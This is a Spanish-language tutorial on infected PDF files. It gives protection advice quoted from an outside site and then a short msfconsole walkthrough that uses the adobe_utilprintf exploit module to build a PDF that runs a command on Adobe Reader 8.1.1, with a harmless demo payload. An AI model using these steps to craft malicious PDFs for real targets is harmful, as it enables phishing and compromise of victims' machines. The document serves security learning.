
![x](imagenes/pdf.png "x")

# Indice de contenido
1. [Teoría pdf infectado](#pdf)
	+ [Medida de protección](#proteccion)
2. [Practica pdf infectado](#practica)
	+ [Herramienta utilizada](#herramienta)
	+ [Verificar](#verificar)
## Teoría: <a name="pdf"></a>
Un pdf infectado, es un pdf modificado aprovechando vulnerabilidades de el propio programa adobe pdf. El cual nos pude permitir desde ejecutar una orden en powershell, hasta poder controlar el dispositivo del otro usuario. Enviar un pdf infectado es una practica muy habitual de los atacantes hacia grandes empresas, debido a que el software esta desactualizado y són más propensos a que el ataque tenga cierto éxito.

Uso de hipervínculos maliciosos en PDF (extraído de  [dataoverhaulers](https://dataoverhaulers.com/can-pdfs-contain-viruses/)):
>PDF documents have a different level of psychological trust than a webpage. But, hyperlinks in PDF text can be just as harmful. Since it’s normal to find links to helpful resources within PDFs, attackers may use this to lead you to malicious sites. The hacker can compromise your system with unsolicited downloads or manipulate you into providing some information you wouldn’t otherwise give.
>
>Most antivirus software is capable of identifying infected hyperlinks. Still, knowing whether the PDF source you are downloading is safe and checking whether the hyperlinks are relevant to the document’s content is an essential step.
>
## Medidas de proteccion <a name="proteccion"></a>
Mantener siempre el software en la ultima version y siempre descargar los pdf desde fuentes oficiales.

Desactivar JavaScript en tu lector de pdf. Como hacerlo: (extraído de [dataoverhaulers](https://dataoverhaulers.com/can-pdfs-contain-viruses/))
>Disable JavaScript on Your PDF Reader
It’s vital to disable JavaScript when opening PDFs from untrusted sources, so an infected document doesn’t execute destructive JavaScript code. This strategy was introduced by Adobe in 2009 when they experienced threats through malicious alterations of JavaScript code in files.
>
>The instructions for turning off JavaScript in Adobe are:
>
>Run Acrobat or Adobe Reader.
Choose Edit and select Preferences.
Pick the JavaScript Category.
Look up the ‘Enable Acrobat JavaScript’ option and uncheck it.
Finalize the process by clicking the OK button.
Whatever PDF reader you’re using, you can follow the specific steps provided on their official website to disable JavaScript.

Tener un antivirius (extraído de [dataoverhaulers](https://dataoverhaulers.com/can-pdfs-contain-viruses/)):
>Your computer’s local antivirus provides you the most comprehensive protection scanning PDF files upon download. After using VirusTotal to check a PDF document before downloading, we recommend running your antimalware software to detect any other problems the online malware scanner might have missed.
>
>Remember that most operating systems like Microsoft Windows and Apple macOS now include security features with built-in virus and malware software. Additionally, there are many free, third-party options like Bitdefender, Avast, and Kaspersky that focus on detecting malicious code and executable files.
>
## Practica: <a name="practica"></a>

* Es una pequeña guía de como hacer un pdf infectado, en este caso nos centramos en una vulnerabilidad de la version de Adobe pdf 8.1.1, utilizando la herramienta msfconsole podemos generar el pdf y ponerle un ejecutable en la CMD de windows. <a name="herramienta"></a>
```
msf6 > use exploit/windows/fileformat/adobe_utilprintf 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/adobe_utilprintf) > set FILENAME guia.pdf
FILENAME => guia.pdf
msf6 exploit(windows/fileformat/adobe_utilprintf) > set PAYLOAD windows/exec
PAYLOAD => windows/exec
msf6 exploit(windows/fileformat/adobe_utilprintf) > set CMD cal.exe
CMD => cal.exe
msf6 exploit(windows/fileformat/adobe_utilprintf) > exploit

[*] Creating 'guia.pdf' file...
[+] guia.pdf stored at /home/nacason12/.msf4/local/guia.pdf
msf6 exploit(windows/fileformat/adobe_utilprintf) > 
```
* En caso de que queramos verificar que esto funciona, tendríamos que instalar Adobe pdf 8.1.1. En el caso que acabamos de crear, al abrir el pdf nos ejecutaría en la consola cal.exe que abre el calendario. Podemos verlo a continuación: <a name="verificar"></a>

![veri](imagenes/pdf_windows.gif "pdf")

